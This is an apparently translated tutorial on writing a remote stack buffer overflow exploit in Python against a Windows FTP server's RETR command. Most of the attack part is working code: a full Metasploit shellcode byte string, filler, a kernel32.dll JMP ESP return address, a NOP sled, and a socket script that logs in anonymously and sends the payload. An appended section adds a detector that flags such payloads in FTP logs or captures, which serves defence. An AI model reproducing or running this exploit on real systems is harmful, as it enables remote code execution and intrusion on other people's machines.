Contents
1. Overview
2. Stack-based buffer overflow attack
2.1 Introduction
2.2 Basic terminology
3. Adding the key elements of the attack
3.1 Implementation
4. Sending the exploit code
4.1 Analysis
4.2 Implementation
1. Overview
Although the Metasploit framework's library contains more than 800 different exploits, there are still times when you have to write a remote exploit yourself. Python simplifies that process. First, let's understand the stack-based buffer overflow.
The success of the Morris worm was due in part to its use of a stack-based buffer overflow. Such vulnerabilities can be exploited because thousands of programs fail to filter or validate user input.
2. Stack-based buffer overflow attack
2.1 Introduction
In a stack-based buffer overflow, unchecked user data overwrites the pointer to the next instruction to be executed (EIP), taking control of the program's execution flow. The exploit code points the EIP register directly at a location inside the shellcode inserted by the attacker. This sequence of machine-code instructions (the shellcode) can add a user to the target system, establish a network connection back to the attacker, or download a stand-alone executable.
Shellcode is almost unlimited in size; it is bounded only by the amount of available memory. There are many ways to exploit different kinds of vulnerabilities today, and the stack-based buffer overflow is one of the most basic.
2.2 Basic terminology
Overflow: the length of the user's input exceeds the maximum length the stack expects, that is, the size of the allocated memory.
Return address: a 4-byte address used to jump directly to the top of the stack. The exploit below uses the address of a JMP ESP instruction in kernel32.dll (a pointer is 4 bytes long).
Padding: a series of NOP (no-operation) instructions placed before the shellcode. It relaxes the accuracy required when the attacker predicts the address to jump to: as long as the jump lands anywhere in the NOP chain, execution slides straight into the shellcode.
Shellcode: a small piece of machine code written in assembly language. In the example below, we generate the shellcode with the Metasploit framework.
3. Adding the key elements of the attack
3.1 Implementation
Start by writing the key elements of the exploit code.
First, we write the hex bytes of the payload generated by the Metasploit framework into the shellcode variable.
Then, in the overflow string, we write 246 letters "A" (hex value \x41).
Next, the ret variable points to the address of an instruction in kernel32.dll that jumps control flow directly to the top of the stack. Our padding variable is 150 NOP instructions; this forms the NOP chain.
Finally, combining all these variables together forms the variable we call crash.
import struct

# Payload generated by the Metasploit framework (Python 3 bytes literal).
shellcode = (b"\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
             b"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
             b"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
             b"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
             b"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
             b"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
             b"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
             b"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
             b"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
             b"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
             b"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
             b"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
             b"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
             b"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
             b"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
             b"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
             b"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
             b"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
             b"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
             b"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
             b"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
             b"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
             b"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
             b"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
             b"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
             b"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
             b"\xba\x1e\x53\x31")

# 246 bytes of filler that reach the saved return address.
overflow = b"\x41" * 246
# Little-endian address of a JMP ESP instruction in kernel32.dll.
ret = struct.pack('<L', 0x7C874413)  # 7C874413 JMP ESP kernel32.dll
# NOP chain: 150 no-operation instructions in front of the shellcode.
padding = b"\x90" * 150
# Overflow bytes, overwritten return address, NOP chain and shellcode combined.
crash = overflow + ret + padding + shellcode
4. Sending the exploit code
4.1 Analysis
Using the Berkeley socket API, create a connection to TCP port 21 on the target host. If the connection succeeds, log in to the host anonymously. Finally, send the FTP command 'RETR' followed by the crash variable. Because the affected program does not check user input properly, this causes a stack-based buffer overflow that overwrites the EIP register, makes the program jump straight to the shellcode, and executes it.
4.2 Implementation
import socket
import sys
import time

target = "TARGET_HOST"  # placeholder: the address of the lab system; not given on the page

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, 21))
except OSError:
    print('[-] Connection to ' + target + ' failed!')
    sys.exit(0)

print('[*] Sending ' + str(len(crash)) + ' byte crash...')
# Anonymous FTP login, then the RETR command carrying the crash variable.
s.send(b"USER anonymous\r\n")
s.recv(1024)
s.send(b"PASS \r\n")
s.recv(1024)
s.send(b"RETR " + crash + b"\r\n")
time.sleep(4)
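The same buffer layout that sections 3.1 and 4.1 describe (a long run of filler, a 4-byte address, a NOP chain, then opaque machine code) is also what a defender can look for in FTP command traffic or server logs. The following is an added example written for this page, not code from the original article or from the Metasploit framework: it splits each FTP command line into verb and argument and flags the three indicators of a stack-overflow attempt. The length thresholds, the session lines and the address bytes in the sample are all constructed for the example, not taken from real traffic.

```python
import re

# Thresholds are assumptions for this example; tune them to the server's real limits.
MAX_ARG_LEN = 200   # longest argument a well-behaved FTP client is expected to send
MIN_NOP_RUN = 16    # a run of at least this many 0x90 bytes is treated as a NOP chain

NOP_RUN = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)


def inspect_ftp_command(line: bytes) -> dict:
    """Split one FTP command line into verb and argument and report overflow indicators."""
    stripped = line.rstrip(b"\r\n")
    verb, _, arg = stripped.partition(b" ")
    findings = []

    # Indicator 1: an argument far longer than any legitimate filename.
    if len(arg) > MAX_ARG_LEN:
        findings.append("overlong argument (%d bytes)" % len(arg))

    # Indicator 2: a NOP chain (consecutive 0x90 bytes) inside the argument.
    if NOP_RUN.search(arg):
        findings.append("NOP chain (run of 0x90 bytes)")

    # Indicator 3: mostly non-printable bytes, i.e. machine code rather than a filename.
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if non_printable and non_printable * 4 > len(arg):  # more than 25% non-printable
        findings.append("binary argument (%d non-printable bytes)" % non_printable)

    return {
        "verb": verb.decode("ascii", "replace").upper(),
        "arg_len": len(arg),
        "findings": findings,
    }


def suspicious_commands(lines):
    """Return the inspection records of every line that raised at least one finding."""
    return [rec for rec in map(inspect_ftp_command, lines) if rec["findings"]]


# Constructed sample session (not captured traffic). The last line mimics the
# layout from the article: filler, a 4-byte address, a NOP chain and a few
# opaque bytes standing in for shellcode. The address bytes are made up.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS \r\n",
    b"RETR readme.txt\r\n",
    b"RETR " + b"A" * 246 + b"\xef\xbe\xad\xde" + b"\x90" * 150 + b"\xbf\x5c\x2a\x11" + b"\r\n",
]

if __name__ == "__main__":
    for rec in suspicious_commands(SAMPLE_SESSION):
        print("%s argument of %d bytes: %s" % (rec["verb"], rec["arg_len"], "; ".join(rec["findings"])))
```

The three checks are independent on purpose: a server that logs commands but truncates long arguments still trips the length check, while a packet capture that preserves the raw bytes also reveals the NOP chain and the binary payload. Feeding the function the command lines from an FTP server's log or from a capture is the only integration step.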